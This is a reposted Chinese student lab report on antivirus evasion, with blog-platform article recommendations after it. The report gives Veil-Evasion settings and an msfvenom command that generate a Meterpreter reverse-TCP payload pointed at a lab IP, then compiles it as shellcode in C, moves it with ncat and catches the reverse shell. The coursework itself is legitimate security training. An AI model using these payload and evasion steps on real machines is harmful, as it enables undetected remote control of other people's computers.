20145324 王嘉澜《网络对抗技术》 免杀原理与实践

最新推荐文章于 2024-07-24 21:03:53 发布
最新推荐文章于 2024-07-24 21:03:53 发布
阅读量78 收藏
点赞数
文章标签: c/c++ 操作系统
原文链接:http://www.cnblogs.com/SJZGM10/p/6616406.html
版权

实验内容

•使用msf编码器,veil-evasion,以及利用shellcode编程等免杀工具,来验证各种免杀方式的免杀强度
•通过组合各种技术实现恶意代码免杀,在另一台有杀毒软件的主机上进行测试

实践步骤

•通过VirSCAN.org来检测上次实验生成的病毒的抗杀能力
•检测结果
885282-20170325100116471-205902034.jpg
•该病毒被检测出来,并被发现是木马病毒
•吓得我赶紧删了,谁知道检查的时候又让传一遍

•使用Veil-Evasion生成可执行文件

•在终端输入指令veil-evasion打开软件
885282-20170325100715158-1969165838.jpg
•设置payload:use python/meterpreter/rev_tcp
•设置反弹连接IP:set LHOST 192.168.88.129
•设置反弹端口4444:set port 4444
•生成:generate
•程序名:5324
•选择操作:1
•程序生成成功,在目录下找到该程序,发送到win检测
885282-20170325101345033-1496610289.jpg
•检测结果
885282-20170325101511221-1083207235.jpg

•C语言调用Shellcode

•在kali下,执行指令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.129 LPORT=5324 -f c 生成一个C语言shellcode数组
885282-20170325101753924-95891048.jpg
•用命令行创建一个C文件:MSSC.c,将上面生成的数组复制到该文件下,并加入一个主函数
•使用命令i686-w64-mingw32-g++ MSSC.c -o MSSC_5324.exe 将该C语言代码MSSC.c转换为一个可在64位win下操作的可执行文件MSSC_5324.exe
885282-20170325103205799-909248878.jpg
•将MSSC_5353.exe传到win,电脑管家马上报告说有危险,添加到信任区,检测
•检测结果
885282-20170325103359705-1426697041.jpg
•很少一部分软件可以查出来
•使用ncat把exe传到电脑
885282-20170325103829283-1533215431.jpg
885282-20170325103841971-264041220.jpg
885282-20170325103855236-1977966287.jpg
•使用电脑管家杀毒,结果发现不了
885282-20170325104019033-242859096.jpg
•在Kali下使用msf监听,运行刚刚编译生成的可执行文件,获取权限
885282-20170325104426846-65440577.jpg
885282-20170325104448330-1768943640.jpg
•回连成功
885282-20170325104514971-1346850211.jpg
885282-20170325104526955-1484905450.jpg

基础问题回答

1、杀软是如何检测出恶意代码的?
•通过特征码:与已经存在的恶意代码进行比对之类的
•通过行为:恶意代码可能会修改注册表、设置自启动、更改系统日志等

2、免杀是做什么?
•通过恶意代码植入技术使得恶意代码不会被杀毒软件检测出来

3、免杀的基本方法有哪些?
•加壳、使用反弹式连接
•用其他的语言编译等

实验总结与体会

触目惊心,平时信赖的杀毒软件也检测不出来自己写的恶意代码,想到以前自己为了电脑安全还一口气装了好几个杀毒软件,too naive

离实战还缺的技术或步骤

杀毒软件的病毒库是不断更新的,真正要实战的话应该还需要投入更多的时间和精力来研究代码漏洞

转载于:https://www.cnblogs.com/SJZGM10/p/6616406.html

weixin_30793643
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
20145324王嘉澜网络对抗技术》 MAL_逆向与Bof基础
weixin_30344795的博客
03-03 74
实践目标 •本次实践的对象是一个名为pwn1的linux可执行文件。 •该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。 •该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。 •我们将学习两种方法 1.利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返...
20145324王嘉澜网络对抗技术》恶意代码分析
weixin_30566111的博客
03-31 66
实验内容 •schtasks、Sysmon对电脑进行系统检测,并分析 •对恶意软件进行静态分析,直接上传到网上,或者利用pe explore等软件 •对恶意软件进行动态分析,使用systracer,以及wireshark分析 实验问答 •1、如果在工作中怀疑一台主机上有恶意代码,但只是猜想,所有想监控下系统一天天的到底在干些什么。请设计下你想监控的操作有哪些,用什么方法来监控。 用主机自带的sch...
20145324王嘉澜网络对抗技术》 后门原理实践
weixin_30533797的博客
03-18 67
实验内容 •使用netcat、socat获取主机操作Shell,并分别设置cron启动与任务计划启动 •使用MSF meterpreter生成后门的可执行文件,并利用ncat或socat传送给主机,接着运行文件获取目标主机的音频、摄像头、击键记录、提权等内容 实验步骤 •用netcat使win获得linux shell •在win中使用ipconfig命令得到主机ip地址 •在win中打开nc,...
20145324王嘉澜网络对抗技术》web安全基础实践
weixin_30463341的博客
05-14 78
实验内容 •使用webgoat进行XSS攻击、CSRF攻击、SQL注入 实验问答 •SQL注入攻击原理,如何防御 ①SQL注入攻击是攻击者在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,把SQL语句当做用户名等输入正常网页中以获取数据库信息的攻击,最终达到欺骗服务器执行恶意的SQL命令 ②对输入的数据进行过滤,在数据库中对密码进行加密 •XSS攻击的原理,如何防御 ①通过对网页...
20145324王嘉澜网络对抗技术》 信息搜集与漏洞扫描
weixin_30662109的博客
04-19 57
实践目标 •掌握信息搜集的最基础技能 实践内容 •使用whois进行域名注册信息查询,使用nslookup进行域名查询 •实现对IP地理位置的查询 •使用PING、namp来探测主机是否活跃 •使用namp来获取目标主机操作系统相关信息,以及端口信息 •使用traceroute进行路由跟踪 •使用OpenVAS获取漏洞信息 实验问答 1、哪些组织负责DNS,IP的 全球根服务器由美国政府授权的IC...
20145324王嘉澜网络对抗技术网络欺诈技术防范
weixin_30830327的博客
04-25 63
实践目标 本实践的目标理解常用网络欺诈背后的原理,以提高防范意识,并提出具体防范方法 实践内容 ①简单应用SET工具建立冒名网站 ②ettercap DNS spoof ③结合应用两种技术,用DNS spoof引导特定访问到冒名网站。 实验问答 •1、通常在什么场景下容易受到DNS spoof攻击 同一个网络下,比如在公共场合连同一个wifi •2、在日常生活工作中如何防范以上两攻击方法 对于冒名...
20145324王嘉澜网络对抗技术》Web基础
weixin_30699831的博客
05-03 71
实践要求 ①Web前端HTML: 能正常安装、启停Apache。理解HTML,理解表单,理解GET与POST方法,编写一个含有表单的HTML ②Web前端javascipt: 理解JavaScript的基本功能,理解DOM。编写JavaScript验证用户名、密码的规则 ③MySQL基础: 正常安装、启动MySQL,建库、创建用户、修改密码、建表 ④Web后端: 编写PHP网页,连接数据库,进行用...
数理统计——基本概念及专题-李泽慧等译
06-09
主要内容包括概率论中的一些课题、统计模型、估计方法、估计的比较——最优化理论、从估计到置信区间和假设检验、最优化检验与置信区间——似然比检验及有关方法,线性模型——回归和方差分析,离散数《数理统计习题...
C++进阶中继承的全部主要内容
2302_80214413的博客
07-22 575
这次小编给大家带来了很全面的C++进阶的继承方面的内容,代码及其注释和解释肯定可以给大家带来很好的学习体验,希望大家收获满满!~~~
【刷题汇总 -- 爱丽丝的人偶、集合、最长回文子序列】
m0_69455439的博客
07-23 615
今日刷题汇总day021 -- 爱丽丝的人偶、集合、最长回文子序列
STL标准模板库---容器篇(一)
U2396573637的博客
07-24 470
对C风格字符串的封装,也是容器类的“先驱”类,也可以称为“实验品”,但这只是相对而言。字符串类string本身功能还是非常强大的。string str;//声明字符串变量//初始化字符串变量//使用重载后的操作符 + 连接两个字符串字符串类还提供了许多成员函数来操作字符串,以下是一些常用的成员函数:size():返回字符串的长度empty():检查字符串是否为空substr():获取子字符串find():查找子字符串在主字符串中的位置replace():替换字符串中的某些字符。
C++笔试强训7
m0_74189279的博客
07-21 951
这意味着编译器会尝试将函数的代码直接插入到每个调用该函数的地方,而不是像通常那样进行函数调用(即,生成调用指令,跳转到函数代码,执行函数体,然后返回)。友元函数是在类外部定义的普通函数,它只能通过传入的参数(如果有的话)来访问类的成员,或者通过类的对象显式地访问(如果该函数设计为接受类的对象作为参数)。函数参数默认值又叫缺省参数,缺省参数必须从右向左开始缺省,必须连续给定缺省值,也就是说,从左到右,一旦遇到一个参数是缺省的,那么之后的参数也必须都是缺省的。指针是类成员函数特有的,用于指向调用该函数的对象。
C++】操作符“new”和“delete”(创建和销毁对象)
qq_65596720的博客
07-19 402
由于C++引入了类的概念所以创建空间和销毁空间变得复杂,使用malloc和free会更加复杂,所以C++引入了new和delete来简化代码。
Leetcode 238. 除自身以外数组的乘积
waterHBO的博客
07-19 355
2 种写法。python 和 C语言。
PyQt5 基础教程
蜡笔小新星的博客
07-21 348
通过本教程,你已经学习了 PyQt5 的核心模块,包括 QtWidgets、QtGui 和 QtCore。这些模块提供了丰富的类和方法,用于创建功能丰富的 GUI 应用程序。创建一个基本的窗口,并设置了其标题、大小和关闭按钮等属性。并在其中添加按钮、文本框、标签、复选框、单选按钮和下拉列表等控件,并设置了它们的属性。这些基础知识将帮助你开始构建更复杂的 PyQt5 应用程序。随着你对 PyQt5 的进一步学习和实践,你将能够创建出功能丰富、用户友好的图形界面应用程序。
2024年华为OD机试真题-虚拟游戏理财-C++-OD统一考试(C卷D卷)
热门推荐
面试高手的博客
07-21 2万+
现有一家Bank,它提供有若干理财产品m,风险及投资回报不同,你有N(元)进行投资,能接受的总风险值为X。第一行:产品数(取值范围[1, 20]),总投资额(整数,取值范围[1, 10000]),可接受的总风险(整数,取值范围[1, 200])投资第二项30个单位,第四项40个单位,总的投资风险为两项相加为4+6=10。第四行:最大投资额度序列,输入为整数,取值范围[1,10000]第二行:产品投资回报率序列,输入为整数,取值范围[1,60]第三行:产品风险值序列,输入为整数,取值范围[1,100]
C++初阶】string类
2301_78022459的博客
07-24 518
C++初阶】string类
LeetCode977 有序数组的平方
daishabby2486的博客
07-24 558
LeetCode977 有序数组的平方的解题记录。
扫雷-C语言
最新发布
h_number_1的博客
07-24 997
扫雷操作的基本实现-C语言
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值